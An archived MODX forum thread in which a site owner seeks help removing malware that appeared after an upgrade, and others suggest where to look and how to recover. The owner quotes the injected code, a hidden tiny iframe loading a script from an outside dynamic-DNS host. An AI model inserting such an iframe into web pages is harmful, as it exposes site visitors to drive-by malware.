We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

Website Malware help removing after upgrade

    • 42601
    • 24 Posts
    thehaag Reply #1, 11 years, 2 months ago
    hi all,

    im hoping that someone is able to assist me, i have just recently upgraded to 2.2.6-pl however i now have amessage from good that my website has malware. if I load the website and select view source i can see the offending code:

    <iframe src="http://fdsfsddfs.zapto.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe></body>

    However, i cannot find it in modx could someone help me out here please??

    Thanks

    Also the manager page keeps refeshing and i have to press stop to even get in.

    Trev
      • 3749
      • 24,544 Posts
      BobRay Reply #2, 11 years, 2 months ago
      It could be coming from just about anywhere, but the first place to look is in the index.php file in the root. Compare it to the original. You probably won't see that string. It will most likely be encoded.

      By far the safest thing would be to restore a backup from before the infection, change all your usernames and passwords, and go from there.
        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
        • 42601
        • 24 Posts
        thehaag Reply #3, 11 years, 2 months ago
        Im struggling to understand how this got onto the website... the only thing i have done is install the new tinyMCE, new modx, and 2 news plugins... I dont understand it. I flushed permissions and flushed cache and thats when this all started.

        this is what my index.php looks like:

        <?php
        require_once dirname(dirname(__FILE__)).'/index.php';
        $modx->request->handleRequest(array('location' => 'source'));

        Does this look normal??

        Trev
          • 3749
          • 24,544 Posts
          BobRay Reply #4, 11 years, 2 months ago
          Not if it's the index.php in the MODX root (the directory with the Manager and Core directories). You could be looking at the wrong one, though.

          Malware can show up for lots of different reasons, it could be a cross-site attack from someone else on a shared server or it could be that someone has used a brute-force attack to get your MODX admin, cPanel, or FTP password by trial-and-error. It could also come from an insecure form on your site.
            Did I help you? Buy me a beer
            Get my Book: MODX:The Official Guide
            MODX info for everyone: http://bobsguides.com/modx.html
            My MODX Extras
            Bob's Guides is now hosted at A2 MODX Hosting
            • 39501
            • 163 Posts
            jonleverrier Reply #5, 11 years, 2 months ago
            Quite a few years ago, Media Temple got hacked, and malware was inserted in to every index file on my web server. Didn't matter what system I was using (MODX, TextPattern, Wordpress etc), they all became infected.

            My first instinct was to point the finger at MODX, TextPattern etc, because at the time Media Temple were being very vague about the situation, however they eventually came clean that their systems had been compromised.

            The malware might not be inserting itself in the web root of your website. It might be triggered from a folder below the web root. If you have access, have a look (including any odd .htaccess files).

            Have you tried googling to see if any other people on your host are having the same issues?

            Could you confirm your hosting provider?
            Can you also confirm, where you got the upgrade package from (was it via the MODX website)?
            [ed. note: jonleverrier last edited this post 11 years, 2 months ago.]